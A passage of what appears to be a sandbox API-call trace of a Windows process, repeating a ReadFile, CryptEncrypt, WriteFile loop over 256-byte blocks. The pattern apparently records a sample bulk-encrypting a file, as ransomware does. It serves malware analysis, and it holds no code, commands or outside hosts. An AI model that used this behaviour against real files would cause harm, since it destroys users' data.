lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.571] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.571] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.571] GetLastError () returned 0x0 [0167.571] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.571] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.571] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.571] GetLastError () returned 0x0 [0167.571] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.571] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.571] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.571] GetLastError () returned 0x0 [0167.571] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.571] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.571] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.571] GetLastError () returned 0x0 [0167.571] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.571] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.571] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.571] GetLastError () returned 0x0 [0167.571] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.571] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.571] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.571] GetLastError () returned 0x0 [0167.571] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.571] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.572] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.572] GetLastError () returned 0x0 [0167.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.572] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.572] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.572] GetLastError () returned 0x0 [0167.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.572] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.572] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.572] GetLastError () returned 0x0 [0167.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.572] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.572] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.572] GetLastError () returned 0x0 [0167.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.572] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.572] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.572] GetLastError () returned 0x0 [0167.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.572] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.572] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.572] GetLastError () returned 0x0 [0167.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.572] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.572] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.572] GetLastError () returned 0x0 [0167.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.573] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.573] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.573] GetLastError () returned 0x0 [0167.573] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.573] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.573] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.573] GetLastError () returned 0x0 [0167.573] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.573] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.573] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.573] GetLastError () returned 0x0 [0167.573] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.573] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.573] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.573] GetLastError () returned 0x0 [0167.573] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.573] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.573] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.573] GetLastError () returned 0x0 [0167.573] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.573] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.573] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.573] GetLastError () returned 0x0 [0167.573] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.574] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.574] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.574] GetLastError () returned 0x0 [0167.574] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.574] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.574] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.574] GetLastError () returned 0x0 [0167.574] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.574] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.574] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.574] GetLastError () returned 0x0 [0167.574] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.574] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.574] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.574] GetLastError () returned 0x0 [0167.574] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.574] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.574] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.574] GetLastError () returned 0x0 [0167.574] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.574] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.574] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.574] GetLastError () returned 0x0 [0167.574] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.574] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.574] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.575] GetLastError () returned 0x0 [0167.575] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.575] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.575] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.575] GetLastError () returned 0x0 [0167.575] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.575] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.575] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.575] GetLastError () returned 0x0 [0167.575] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.575] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.575] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.575] GetLastError () returned 0x0 [0167.575] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.575] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.575] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.575] GetLastError () returned 0x0 [0167.575] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.575] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.575] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.575] GetLastError () returned 0x0 [0167.575] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.575] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.575] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.575] GetLastError () returned 0x0 [0167.575] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.576] ReadFile (in: hFile=0x15b0, 